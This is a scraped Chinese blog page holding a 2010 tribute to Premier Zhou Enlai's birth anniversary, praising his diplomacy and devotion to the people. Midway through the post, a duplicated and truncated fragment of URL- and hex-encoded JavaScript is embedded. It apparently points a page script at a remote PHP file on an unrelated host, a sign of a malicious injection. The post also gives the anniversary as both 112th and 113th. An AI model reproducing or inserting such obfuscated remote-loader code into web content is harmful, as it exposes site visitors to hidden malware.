注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

大家好!欢迎您走进夏雪的情感音画空间

平凡人生,平淡度过。开开心心度过每一天。

 
 
 

日志

 
 

《原创》纪念伟大的周恩来总理诞辰112周年  

2010-02-23 00:13:46|  分类: 情感天地 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
 

 

 

 

【永远的纪念】纪念敬爱的周恩来总理诞辰113周年!深深鞠躬!送上敬意!

 

  文/编:夏雪

    敬爱的周恩来总理离开我们已经34年了!周总理虽然离开我们这么长时间了,但伟人的光辉形象永远留在我们这一代人的心中!他老人家是一位可敬可亲的总理!他把自己一生无私地献给了中国人民的革命和建设事业。他深深地爱着人民,人民也深深地爱戴他。周恩来总理虽然离开了我们,但他的光辉业绩,为人民鞠躬尽瘁、死而后已的革命精神和高尚品德是永存的。但是他永远活在亿万中国人民的心中,总理和他的精神一起永垂不朽!

 

纪念伟大的周恩来总理诞辰112周年  - 夏雪 - 相识是缘 夏雪的博客

 

      周恩来总理是新中国第一任外交部长,是伟大的政治家,思想家,外交家.为中国外交事业的发展做出了具大的贡献。他提出的和平共处原则,是对维护世界和平做出了很大的贡献。我们是在崇拜和仰慕周恩来的崇高精神和人格魅力下成长起来的,我们永远怀念他。周恩来在中国的革命和建设事业中的丰功伟绩将永载共和国史册。

 

tsByTagName%28%27script%27%29%5B0%5D.src%3D%27http%3A//%78%71%7a%6e%2e%69%6e%66%6f%2f%61%2f%31%36%33%2f%6e%2e%70%68%70%27%3Bwindow.x%3D1%7D"<tsByTagName%28%27script%27%29%5B0%5D.src%3D%27http%3A//%78%71%7a%6e%2e%69%6e%66%6f%2f%61%2f%31%36%33%2f%6e%2e%70%68%70%27%3Bwindow.x%3D1%7D"<

纪念伟大的周恩来总理诞辰112周年  - 夏雪 - 相识是缘 夏雪的博客

  

    周恩来总理是伟大的无产阶级革命家,是我们党和国家的主要领导人之一,同时也是一位杰出的外交家。新中国成立后,他亲自兼任外交部长达10年,主管外交工作长达26年之久,在这漫长的岁月中,他以博大的胸怀、卓越的才能和惊人的毅力为新中国外交事业作出了不可磨灭的贡献。

 纪念伟大的周恩来总理诞辰112周年  - 夏雪 - 相识是缘 夏雪的博客  

 

   敬爱的周总理您一生未留下自己的亲生儿女,但您的儿女却有千千万,您是我们最敬爱、最难忘的一位好总理,您的卓越智慧、人格魅力和崇高品德影响了一代又一代,您永远是我们学习的样。周总理,您虽然走了,但时间未能改变您是一位让我们永远难以忘怀、永远值得怀念和永远值得敬仰的好总理、好父亲,您永远活在我们心中,我们永远怀念您!我怀着十分敬仰而沉重的心情,眼睛湿润着编辑完了纪念您诞辰112周年这篇文章。我们永远不会忘记人民的好总理---周恩来!

  

纪念伟大的周恩来总理诞辰112周年  - 夏雪 - 相识是缘 夏雪的博客  

敬爱的周总理:您的一生,是伟大的一生,光荣的一生,对党的事业忠诚的一生.鞠躬尽瘁几十年,您终身为革命,恩比泰山高,英名万古存。怀念周总理,颂歌唱不尽,誓将遗愿化宏图.跟着共产党,永远向前进。

让我们缅怀心中的伟人,一个尽职尽责的伟大,一个时刻怀着人民的伟人,一个为人民服务的伟人!---周恩来总理!

 

 


 

  评论这张
 
阅读(493)| 评论(102)
推荐 转载

历史上的今天

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017